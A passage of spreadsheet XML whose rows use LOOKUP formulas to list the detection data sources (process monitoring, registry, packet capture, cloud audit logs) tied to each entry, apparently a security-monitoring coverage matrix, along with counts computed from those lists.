      </c>
      <c r="E202" s="13">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F202" s="13"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="53" t="s">
        <v>1430</v>
      </c>
      <c r="B203" s="13" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D203" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F203" s="13"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="53" t="s">
        <v>1435</v>
      </c>
      <c r="B204" s="13" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,Process monitoring,Process command-line parameters,File monitoring,Windows Registry</v>
      </c>
      <c r="C204" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D204" s="13">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E204" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F204" s="13"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="53" t="s">
        <v>1440</v>
      </c>
      <c r="B205" s="13" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D205" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F205" s="13"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="55" t="s">
        <v>1445</v>
      </c>
      <c r="B206" s="13" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C206" s="17">
        <v>0</v>
      </c>
      <c r="D206" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E206" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="13"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="53" t="s">
        <v>1449</v>
      </c>
      <c r="B207" s="13" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C207" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D207" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E207" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F207" s="13"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="53" t="s">
        <v>1452</v>
      </c>
      <c r="B208" s="13" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>332</v>
      </c>
      <c r="D208" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="13"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="55" t="s">
        <v>251</v>
      </c>
      <c r="B209" s="13" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C209" s="17">
        <v>100</v>
      </c>
      <c r="D209" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E209" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="13"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="53" t="s">
        <v>262</v>
      </c>
      <c r="B210" s="13" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>335</v>
      </c>
      <c r="D210" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E210" s="13">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F210" s="13"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="53" t="s">
        <v>266</v>
      </c>
      <c r="B211" s="13" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C211" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D211" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="13"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="53" t="s">
        <v>288</v>
      </c>
      <c r="B212" s="13" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D212" s="13">
        <f t="shared" si="7"/>
        <v>8</v>
      </c>
      <c r="E212" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F212" s="13"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="53" t="s">
        <v>290</v>
      </c>
      <c r="B213" s="13" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C213" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D213" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E213" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F213" s="13"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="53" t="s">
        <v>302</v>
      </c>
      <c r="B214" s="13" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D214" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E214" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="13"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="53" t="s">
        <v>305</v>
      </c>
      <c r="B215" s="13" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D215" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E215" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F215" s="13"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="53" t="s">
        <v>308</v>
      </c>
      <c r="B216" s="13" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D216" s="13">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E216" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F216" s="13"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="53" t="s">
        <v>310</v>
      </c>
      <c r="B217" s="13" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D217" s="13">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E217" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="13"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="53" t="s">
        <v>318</v>
      </c>
      <c r="B218" s="13" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D218" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E218" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F218" s="13"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="53" t="s">
        <v>1501</v>
      </c>
      <c r="B219" s="13" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Web proxy</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D219" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E219" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="13"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="53" t="s">
        <v>1506</v>
      </c>
      <c r="B220" s="13" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Web proxy</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D220" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E220" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F220" s="13"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="53" t="s">
        <v>1509</v>
      </c>
      <c r="B221" s="13" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D221" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F221" s="13"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="53" t="s">
        <v>321</v>
      </c>
      <c r="B222" s="13" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C222" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D222" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F222" s="13"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="53" t="s">
        <v>323</v>
      </c>
      <c r="B223" s="13" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C223" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D223" s="13">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E223" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F223" s="13"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="53" t="s">
        <v>324</v>
      </c>
      <c r="B224" s="13" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C224" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D224" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E224" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F224" s="13"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="55" t="s">
        <v>325</v>
      </c>
      <c r="B225" s="13" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C225" s="17">
        <v>100</v>
      </c>
      <c r="D225" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E225" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F225" s="13"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="53" t="s">
        <v>326</v>
      </c>
      <c r="B226" s="13" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C226" s="17" t="s">
        <v>352</v>
      </c>
      <c r="D226" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F226" s="13"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="53" t="s">
        <v>327</v>
      </c>
      <c r="B227" s="13" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>354</v>
      </c>
      <c r="D227" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E227" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F227" s="13"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="55" t="s">
        <v>328</v>
      </c>
      <c r="B228" s="13" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C228" s="17">
        <v>100</v>
      </c>
      <c r="D228" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E228" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F228" s="13"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="53" t="s">
        <v>1543</v>
      </c>
      <c r="B229" s="13" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process monitoring,Web proxy</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D229" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F229" s="13"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="53" t="s">
        <v>1548</v>
      </c>
      <c r="B230" s="13" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>358</v>
      </c>
      <c r="D230" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E230" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F230" s="13"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="53" t="s">
        <v>329</v>
      </c>
      <c r="B231" s="13" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D231" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E231" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F231" s="13"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="53" t="s">
        <v>1558</v>
      </c>
      <c r="B232" s="13" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D232" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E232" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F232" s="13"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="53" t="s">
        <v>331</v>
      </c>
      <c r="B233" s="13" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C233" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D233" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E233" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F233" s="13"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="53" t="s">
        <v>336</v>
      </c>
      <c r="B234" s="13" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D234" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E234" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F234" s="13"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="53" t="s">
        <v>337</v>
      </c>
      <c r="B235" s="13" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C235" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D235" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E235" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F235" s="13"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="53" t="s">
        <v>338</v>
      </c>
      <c r="B236" s="13" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D236" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E236" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F236" s="13"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="53" t="s">
        <v>339</v>
      </c>
      <c r="B237" s="13" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C237" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D237" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E237" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F237" s="13"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="53" t="s">
        <v>1583</v>
      </c>
      <c r="B238" s="13" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Third-party application logs,Authentication logs</v>
      </c>
      <c r="C238" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D238" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E238" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F238" s="13"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="53" t="s">
        <v>1589</v>
      </c>
      <c r="B239" s="13" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C239" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D239" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E239" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F239" s="13"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="53" t="s">
        <v>342</v>
      </c>
      <c r="B240" s="13" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>369</v>
      </c>
      <c r="D240" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E240" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F240" s="13"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="53" t="s">
        <v>1598</v>
      </c>
      <c r="B241" s="13" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D241" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F241" s="13"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="53" t="s">
        <v>343</v>
      </c>
      <c r="B242" s="13" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C242" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D242" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E242" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F242" s="13"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="53" t="s">
        <v>344</v>
      </c>
      <c r="B243" s="13" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C243" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D243" s="13">
        <f t="shared" si="7"/>
        <v>9</v>
      </c>
      <c r="E243" s="13">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F243" s="13"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="53" t="s">
        <v>1610</v>
      </c>
      <c r="B244" s="13" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C244" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D244" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E244" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F244" s="13"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="53" t="s">
        <v>1615</v>
      </c>
      <c r="B245" s="13" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C245" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D245" s="13">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E245" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F245" s="13"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="53" t="s">
        <v>1620</v>
      </c>
      <c r="B246" s="45" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process use of network,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C246" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D246" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E246" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F246" s="13"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="53" t="s">
        <v>1625</v>
      </c>
      <c r="B247" s="45" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C247" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D247" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E247" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F247" s="13"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="53" t="s">
        <v>1629</v>
      </c>
      <c r="B248" s="45" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C248" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D248" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E248" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F248" s="13"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="53" t="s">
        <v>1633</v>
      </c>
      <c r="B249" s="45" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C249" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D249" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E249" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F249" s="13"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="53" t="s">
        <v>1638</v>
      </c>
      <c r="B250" s="45" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C250" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D250" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E250" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F250" s="13"/>
      <c r="G250" s="19"/>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="53" t="s">
        <v>1643</v>
      </c>
      <c r="B251" s="45" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C251" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D251" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E251" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F251" s="13"/>
      <c r="G251" s="19"/>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="53" t="s">
        <v>1647</v>
      </c>
      <c r="B252" s="45" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C252" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D252" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E252" s="45">
